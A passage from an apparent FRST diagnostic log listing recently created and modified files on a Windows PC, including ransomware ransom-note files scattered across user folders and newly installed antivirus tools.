2014-06-05 06:11 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll 2014-09-19 02:49 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\tssdisai.dll 2014-09-19 02:48 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe 2014-09-19 02:48 - 2014-03-06 17:47 - 01419264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll 2014-09-19 02:48 - 2014-03-06 17:08 - 01845760 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-09-19 02:46 - 2014-05-28 21:04 - 00094552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys 2014-09-19 02:46 - 2014-05-07 18:34 - 00328024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys 2014-09-19 00:59 - 2014-09-23 13:09 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\vlc 2014-09-18 23:41 - 2014-09-18 23:45 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-09-18 17:39 - 2014-09-18 17:39 - 00008176 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-09-18 17:39 - 2014-09-18 17:39 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL 2014-09-17 08:48 - 2014-09-17 16:14 - 00023552 _____ () C:\ProgramData\893686b8 2014-09-17 08:48 - 2014-09-17 16:14 - 00020954 _____ () C:\Users\Kulle\AppData\Local\893686b8 2014-09-16 04:09 - 2014-09-21 22:08 - 00001560 _____ () C:\Users\Kulle\Desktop\grpconv.txt 2014-09-11 10:06 - 2014-09-11 10:06 - 00146352 _____ (Tim Kosse) C:\Users\Kulle\AppData\Roaming\poumel.exe 2014-09-07 19:12 - 2014-09-16 05:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-01 02:37 - 2014-09-01 02:36 - 06052529 _____ (Tim Kosse) C:\Users\Kulle\Downloads\FileZilla_3.9.0.3_win32-setup.exe ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-23 13:35 - 2014-09-23 13:34 - 00029241 _____ () C:\Users\Kulle\Desktop\FRST.txt 2014-09-23 13:34 - 2014-09-23 13:33 - 00000000 ____D () C:\FRST 2014-09-23 13:34 - 2012-12-03 17:25 - 00000000 ____D () C:\Users\Kulle\AppData\Local\CrashDumps 2014-09-23 13:31 - 2014-09-23 13:31 - 02106368 _____ (Farbar) C:\Users\Kulle\Desktop\FRST64.exe 2014-09-23 13:24 - 2014-02-03 11:56 - 00000582 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2997053151-1021370575-3583938921-1001.job 2014-09-23 13:18 - 2012-12-03 16:36 - 01554528 _____ () C:\Windows\WindowsUpdate.log 2014-09-23 13:09 - 2014-09-19 00:59 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\vlc 2014-09-23 13:06 - 2012-12-03 18:04 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-09-23 13:05 - 2012-07-26 00:59 - 00000000 ____D () C:\Windows\CbsTemp 2014-09-23 13:04 - 2014-09-23 13:04 - 00015872 _____ () C:\Users\Kulle\Desktop\DECRYPTED-file.xls 2014-09-23 12:55 - 2012-11-09 02:14 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery 2014-09-23 12:52 - 2014-09-22 13:29 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-23 12:52 - 2012-12-03 16:44 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 12:48 - 2014-09-23 02:43 - 00003208 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 12:48 - 2014-09-22 16:49 - 00003342 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 12:47 - 2013-05-25 17:49 - 00000474 _____ () C:\Windows\SysWOW64\BOT.log 2014-09-23 12:47 - 2012-12-03 18:04 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-09-23 12:46 - 2013-05-25 17:49 - 00000151 _____ () C:\Windows\SysWOW64\AS_Storage.log 2014-09-23 12:46 - 2012-11-09 03:59 - 00000000 ____D () C:\ProgramData\NVIDIA 2014-09-23 12:46 - 2012-07-26 00:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-09-23 11:00 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\sru 2014-09-23 04:38 - 2014-09-22 02:16 - 00004924 _____ () C:\Users\Kulle\Desktop\9-21.txt 2014-09-23 03:54 - 2014-09-23 03:54 - 00000000 ___RD () C:\Users\Kulle\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices 2014-09-23 03:50 - 2014-09-22 02:31 - 00003364 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 03:50 - 2014-09-22 02:31 - 00003230 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 02:25 - 2012-11-09 03:57 - 01646330 _____ () C:\Windows\PFRO.log 2014-09-23 02:17 - 2014-09-23 02:17 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\AVAST Software 2014-09-23 02:17 - 2014-09-23 02:13 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update 2014-09-23 02:14 - 2014-09-23 02:14 - 00001928 _____ () C:\Users\Public\Desktop\avast! Free Antivirus.lnk 2014-09-23 02:14 - 2014-09-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast 2014-09-23 02:13 - 2014-09-23 02:13 - 00427360 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 01041168 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00307344 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe 2014-09-23 02:12 - 2014-09-23 02:13 - 00224896 _____ () C:\Windows\system32\Drivers\aswVmm.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00093568 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00092008 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00079184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys 2014-09-23 02:12 - 2014-09-23 02:13 - 00029208 _____ () C:\Windows\system32\Drivers\aswHwid.sys 2014-09-23 02:12 - 2014-09-23 02:12 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr 2014-09-23 02:11 - 2014-09-23 02:11 - 00000000 ____D () C:\Program Files\AVAST Software 2014-09-23 02:11 - 2014-09-21 16:11 - 00000000 ____D () C:\ProgramData\AVAST Software 2014-09-23 02:10 - 2014-09-23 02:10 - 04862664 _____ (AVAST Software) C:\Users\Kulle\Downloads\avast_free_antivirus_setup_online.exe 2014-09-22 19:36 - 2012-07-26 00:28 - 00006990 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-09-22 18:28 - 2014-09-22 18:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2014-09-22 18:27 - 2014-09-22 18:27 - 00000000 ____D () C:\Users\Kulle\AppData\Local\NVIDIA 2014-09-22 18:19 - 2012-07-26 00:21 - 00028701 _____ () C:\Windows\setupact.log 2014-09-22 18:17 - 2012-12-03 16:35 - 00000000 ____D () C:\Users\Kulle 2014-09-22 18:17 - 2012-11-09 03:58 - 00000000 ____D () C:\ProgramData\NVIDIA Corporation 2014-09-22 18:17 - 2012-11-09 03:58 - 00000000 ____D () C:\Program Files\NVIDIA Corporation 2014-09-22 18:17 - 2012-11-09 03:58 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation 2014-09-22 18:17 - 2012-07-26 01:12 - 00000000 ___RD () C:\Windows\ToastData 2014-09-22 18:11 - 2014-09-22 18:11 - 00002182 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware Premium.txt 2014-09-22 18:08 - 2014-09-22 13:29 - 00001068 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-22 18:08 - 2014-09-22 13:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-22 18:08 - 2014-09-22 13:28 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-09-22 18:07 - 2014-09-22 18:07 - 17291904 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam_premium.exe 2014-09-22 17:08 - 2013-03-14 03:04 - 00000000 ____D () C:\Program Files\Microsoft Silverlight 2014-09-22 17:08 - 2013-03-14 03:04 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight 2014-09-22 16:55 - 2014-09-22 16:55 - 00000000 ____D () C:\Program Files\Common Files\DESIGNER 2014-09-22 16:55 - 2013-03-14 03:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2014-09-22 16:44 - 2014-09-22 16:44 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-09-22 16:44 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\WinStore 2014-09-22 16:40 - 2013-08-14 18:49 - 00000000 ____D () C:\Windows\system32\MRT 2014-09-22 16:13 - 2014-09-22 16:13 - 00456864 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-09-22 15:50 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility 2014-09-22 15:50 - 2012-07-26 01:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility 2014-09-22 15:49 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\SecureBootUpdates 2014-09-22 15:49 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal 2014-09-22 13:47 - 2014-09-22 01:05 - 00000000 __SHD () C:\ProgramData\USB Adapter Updater 2014-09-22 13:47 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\Web 2014-09-22 13:46 - 2014-09-22 13:46 - 00005100 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware.txt 2014-09-22 13:28 - 2014-09-22 13:28 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-22 13:15 - 2014-09-22 13:15 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam-setup-2.0.2.1012.exe 2014-09-22 03:09 - 2012-07-25 22:26 - 00262144 ___SH () C:\Windows\system32\config\BBI 2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.HTML 2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.HTML 2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.TXT 2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.TXT 2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.URL 2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.URL 2014-09-21 23:47 - 2013-09-18 16:05 - 00000000 ___RD () C:\Users\Kulle\Dropbox 2014-09-21 23:47 - 2013-08-04 23:19 - 00000000 ___RD () C:\Users\Kulle\Google Drive 2014-09-21 23:47 - 2013-05-25 17:33 - 00000000 ____D () C:\Users\Kulle\Downloads\roxio.creator.2012.pro.en 2014-09-21 23:47 - 2012-12-02 16:30 - 00000000 ____D () C:\Users\Kulle\Documents\Work 2014-09-21 23:42 - 2012-12-04 14:31 - 00000000 ____D () C:\Users\Kulle\Documents\Visual Studio 2012 2014-09-21 23:42 - 2012-12-03 17:27 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-09-21 23:42 - 2012-12-02 16:30 - 00000000 ____D () C:\Users\Kulle\Documents\Visual Studio 2010 2014-09-21 23:42 - 2012-12-02 16:27 - 00000000 ____D () C:\Users\Kulle\Documents\UCI Extension 2014-09-21 23:39 - 2013-05-26 16:21 - 00000000 ____D () C:\Users\Kulle\Documents\Transferred from Compaq 2014-09-21 23:38 - 2012-12-04 02:29 - 00000000 ____D () C:\Users\Kulle\Documents\Technical 2014-09-21 23:33 - 2013-03-19 14:14 - 00000000 ____D () C:\Users\Kulle\Documents\Schedules 2014-09-21 23:33 - 2012-12-11 02:27 - 00000000 ____D () C:\Users\Kulle\Documents\SQL Server Management Studio 2014-09-21 23:33 - 2012-12-02 16:26 - 00000000 ____D () C:\Users\Kulle\Documents\Tax Data 2014-09-21 23:33 - 2012-12-02 16:26 - 00000000 ____D () C:\Users\Kulle\Documents\Symantec 2014-09-21 23:33 - 2012-12-02 16:23 - 00000000 ____D () C:\Users\Kulle\Documents\Scanned 2014-09-21 23:27 - 2012-12-02 16:23 - 00000000 ____D () C:\Users\Kulle\Documents\ReVoice 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Recipes 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Receipts 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Quickbooks Exports 2014-09-21 23:26 - 2012-12-02 16:22 - 00000000 ____D () C:\Users\Kulle\Documents\Product Manuals 2014-09-21 23:25 - 2012-12-02 16:21 - 00000000 ____D () C:\Users\Kulle\Documents\Print Shop Projects 2014-09-21 23:24 - 2014-06-13 02:47 - 00000000 ____D () C:\Users\Kulle\Documents\Places of Interest 2014-09-21 23:24 - 2013-05-26 00:11 - 00000000 ____D () C:\Users\Kulle\Documents\Outlook Files 2014-09-21 23:24 - 2012-12-02 16:21 - 00000000 ____D () C:\Users\Kulle\Documents\Paper Models 2014-09-21 23:23 - 2012-12-14 23:35 - 00000000 ___SD () C:\Users\Kulle\Documents\My Data Sources 2014-09-21 23:23 - 2012-12-02 16:20 - 00000000 ____D () C:\Users\Kulle\Documents\News Articles 2014-09-21 23:23 - 2012-12-02 16:18 - 00000000 ____D () C:\Users\Kulle\Documents\My Web Sites 2014-09-21 23:13 - 2012-12-02 15:22 - 00000000 ____D () C:\Users\Kulle\Documents\Movies 2014-09-21 23:13 - 2012-12-02 14:55 - 00000000 ____D () C:\Users\Kulle\Documents\Miscellaneous 2014-09-21 23:11 - 2012-12-02 14:55 - 00000000 ____D () C:\Users\Kulle\Documents\Medical 2014-09-21 23:11 - 2012-12-02 14:55 - 00000000 ____D () C:\Users\Kulle\Documents\Maps & Seating Charts 2014-09-21 23:10 - 2012-12-04 02:23 - 00000000 ____D () C:\Users\Kulle\Documents\Lists 2014-09-21 22:52 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Letters 2014-09-21 22:51 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Labels 2014-09-21 22:51 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Itemizations 2014-09-21 22:42 - 2012-12-02 14:39 - 00000000 ____D () C:\Users\Kulle\Documents\Garden Grove Journal 2014-09-21 22:42 - 2012-12-02 14:39 - 00000000 ____D () C:\Users\Kulle\Documents\Forms 2014-09-21 22:42 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\Finances 2014-09-21 22:37 - 2012-12-02 16:36 - 00000000 ____D () C:\Users\Kulle\Documents\Ema 2014-09-21 22:37 - 2012-12-02 16:35 - 00000000 ____D () C:\Users\Kulle\Documents\Driver Download CD for Dell 2014-09-21 22:37 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\Faxes 2014-09-21 22:37 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\Envelopes 2014-09-21 22:37 - 2012-12-02 02:01 - 00000000 ____D () C:\Users\Kulle\Documents\EML Copies for eBay Dispute 2014-09-21 22:35 - 2012-12-05 03:07 - 00000000 ____D () C:\Users\Kulle\Documents\CyberLink 2014-09-21 22:35 - 2012-12-02 16:34 - 00000000 ____D () C:\Users\Kulle\Documents\Condo Search 2014-09-21 22:35 - 2012-01-30 04:50 - 00001560 _____ () C:\Users\Kulle\Documents\continue.txt 2014-09-21 22:34 - 2012-12-02 16:32 - 00000000 ____D () C:\Users\Kulle\Documents\CD Factory 2014-09-21 22:33 - 2012-12-02 16:32 - 00000000 ____D () C:\Users\Kulle\Documents\Audio Clips 2014-09-21 22:33 - 2012-12-02 16:30 - 00000000 ____D () C:\Users\Kulle\Documents\Activities 2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.HTML 2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.HTML 2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.TXT 2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.TXT 2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.URL 2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.URL 2014-09-21 22:08 - 2014-09-19 04:05 - 00000792 _____ () C:\Users\Kulle\Desktop\Frequent Pages Listed on New Tab.txt 2014-09-21 22:08 - 2014-09-16 04:09 - 00001560 _____ () C:\Users\Kulle\Desktop\grpconv.txt 2014-09-21 22:08 - 2014-08-15 21:46 - 00013080 _____ () C:\Users\Kulle\Desktop\URLs for Tork.txt 2014-09-21 22:08 - 2014-05-29 03:31 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\RealNetworks 2014-09-21 22:08 - 2014-04-24 14:07 - 00000000 ____D () C:\Users\Kulle\Documents\20140608 Carl’s Jr_® Caramel Shake_files 2014-09-21 22:08 - 2013-07-28 17:21 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Samsung 2014-09-21 22:08 - 2012-12-08 14:26 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Real 2014-09-21 22:08 - 2012-12-06 23:47 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\TeamViewer 2014-09-21 19:25 - 2013-09-09 15:14 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Mozilla 2014-09-21 19:14 - 2014-05-17 01:27 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Corel 2014-09-21 19:14 - 2013-07-22 17:25 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\Dropbox 2014-09-21 19:11 - 2014-09-21 19:11 - 00008178 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.HTML 2014-09-21 19:11 - 2014-09-21 19:11 - 00004134 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.TXT 2014-09-21 19:11 - 2014-09-21 19:11 - 00000254 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.URL 2014-09-21 19:11 - 2013-04-02 16:24 - 00000000 ____D () C:\Users\Kulle\AppData\Local\webkit 2014-09-21 19:11 - 2012-12-03 16:37 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Power2Go8 2014-09-21 17:53 - 2013-08-30 13:49 - 00000000 ____D () C:\ProgramData\iolo 2014-09-21 17:50 - 2014-09-21 17:50 - 00001447 _____ () C:\Users\Kulle\Desktop\LiveBoost.lnk 2014-09-21 17:50 - 2014-01-02 12:28 - 00003144 _____ () C:\Windows\System32\Tasks\iolo Process Governor 2014-09-21 17:50 - 2014-01-02 12:28 - 00000000 ____D () C:\ProgramData\ioloGovernor 2014-09-21 17:50 - 2013-08-30 16:05 - 00001443 _____ () C:\Users\Kulle\Desktop\System Mechanic Professional.lnk 2014-09-21 17:50 - 2013-08-30 16:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Mechanic Professional 2014-09-21 17:50 - 2013-08-30 13:49 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\iolo 2014-09-21 12:51 - 2014-09-21 12:51 - 1944573530 _____ () C:\Windows\MEMORY.DMP 2014-09-21 12:51 - 2014-09-21 12:51 - 00296792 _____ () C:\Windows\Minidump\092114-38125-01.dmp 2014-09-21 12:51 - 2013-09-22 22:20 - 00000000 ____D () C:\Windows\Minidump 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Windows & Goodies 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Video Clips 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Games 2014-09-20 22:49 - 2012-12-02 14:47 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Cartoons & Animation 2014-09-20 22:49 - 2012-12-02 14:46 - 00000000 ____D () C:\Users\Kulle\Documents\Internet Audio Clips 2014-09-20 22:49 - 2012-12-02 14:46 - 00000000 ____D () C:\Users\Kulle\Documents\Insurance, Auto 2014-09-20 22:49 - 2012-12-02 14:39 - 00000000 ____D () C:\Users\Kulle\Documents\HTML Docs 2014-09-20 19:55 - 2012-12-14 15:56 - 00000000 ____D () C:\Users\Kulle\AppData\Local\join.me 2014-09-20 19:54 - 2014-05-29 03:30 - 00000000 ____D () C:\ProgramData\RealNetworks 2014-09-20 19:54 - 2013-10-21 15:38 - 00000000 ____D () C:\ProgramData\Wondershare Application Common Data 2014-09-20 19:54 - 2012-12-08 03:46 - 00000000 ____D () C:\ProgramData\Real 2014-09-20 19:53 - 2012-12-22 14:17 - 00000000 ____D () C:\ProgramData\Broderbund Software 2014-09-20 15:54 - 2012-12-10 02:54 - 00000000 ____D () C:\inetpub 2014-09-20 15:51 - 2012-11-09 02:11 - 00000000 ____D () C:\ProgramData\install_clap 2014-09-20 00:39 - 2014-02-03 11:56 - 00003584 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-19 02:07 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\NDF 2014-09-18 23:52 - 2013-09-09 15:13 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-09-18 23:51 - 2014-07-31 03:43 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox.bak 2014-09-18 23:45 - 2014-09-18 23:41 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-09-18 20:28 - 2012-07-25 19:16 - 00000000 __SHD () C:\Users\Kulle\AppData\Roaming\ihadtvwv 2014-09-18 17:48 - 2012-12-03 18:04 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Google 2014-09-18 17:45 - 2013-09-10 13:01 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Citrix 2014-09-18 17:45 - 2012-12-05 03:07 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Cyberlink 2014-09-18 17:43 - 2013-04-27 18:22 - 00000000 ____D () C:\Users\Kulle\AppData\Local\autorun 2014-09-18 17:43 - 2012-12-22 14:22 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Broderbund Software 2014-09-18 17:42 - 2012-12-14 20:16 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Apple Computer 2014-09-18 17:39 - 2014-09-18 17:39 - 00008176 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-09-18 17:39 - 2014-09-18 17:39 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL 2014-09-18 17:39 - 2013-06-21 16:21 - 00001408 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT.zuknxtk 2014-09-17 16:14 - 2014-09-17 08:48 - 00023552 _____ () C:\ProgramData\893686b8 2014-09-17 16:14 - 2014-09-17 08:48 - 00020954 _____ () C:\Users\Kulle\AppData\Local\893686b8 2014-09-17 07:56 - 2012-12-06 21:47 - 00000000 ____D () C:\Users\Kulle\AppData\Local\Deployment 2014-09-16 19:57 - 2013-03-22 01:20 - 00000000 ____D () C:\Delete 2014-09-16 05:02 - 2014-09-07 19:12 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-16 04:16 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\AUInstallAgent 2014-09-11 10:06 - 2014-09-11 10:06 - 00146352 _____ (Tim Kosse) C:\Users\Kulle\AppData\Roaming\poumel.exe 2014-09-04 23:07 - 2012-12-05 03:07 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\CyberLink 2014-09-04 15:36 - 2014-09-19 03:27 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-09-02 18:49 - 2014-09-19 03:27 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-09-02 12:32 - 2013-05-19 03:16 - 00705480 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-09-02 12:32 - 2013-05-19 03:16 - 00104904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-09-01 15:41 - 2013-02-28 12:42 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\FileZilla 2014-09-01 04:25 - 2013-02-28 12:54 - 00000600 _____ () C:\Users\Kulle\AppData\Local\PUTTY.RND 2014-09-01 02:37 - 2013-02-28 12:42 - 00001966 _____ () C:\Users\Public\Desktop\FileZilla Client.lnk 2014-09-01 02:37 - 2013-02-28 12:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client 2014-09-01 02:37 - 2013-02-28 12:42 - 00000000 ____D () C:\Program Files (x86)\FileZilla FTP Client 2014-09-01 02:36 - 2014-09-01 02:37 - 06052529 _____ (Tim Kosse) C:\Users\Kulle\Downloads\FileZilla_3.9.0.3_win32-setup.exe 2014-08-29 22:48 - 2014-09-22 18:14 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll 2014-08-29 22:47 - 2014-09-22 18:14 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-08-29 22:46 - 2014-09-22 18:14 - 02306560 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2014-08-29 21:05 - 2014-09-22 18:14 - 08858112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll 2014-08-29 21:04 - 2014-09-22 18:14 - 02416128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-08-29 21:03 - 2014-09-22 18:14 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2014-08-29 13:01 - 2012-12-13 04:18 - 101694776 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-08-28 04:34 - 2014-09-22 16:24 - 00059400 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe 2014-08-27 23:05 - 2014-09-22 16:24 - 00630272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2014-08-27 23:05 - 2014-09-22 16:24 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll 2014-08-27 23:05 - 2014-09-22 16:24 - 00086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll 2014-08-27 23:05 - 2014-09-22 16:24 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe 2014-08-27 23:02 - 2014-09-22 16:24 - 00040448 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe 2014-08-27 23:01 - 2014-09-22 16:24 - 03285504 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 01623552 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00253440 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll 2014-08-27 23:01 - 2014-09-22 16:24 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\wuaext.dll 2014-08-26 02:06 - 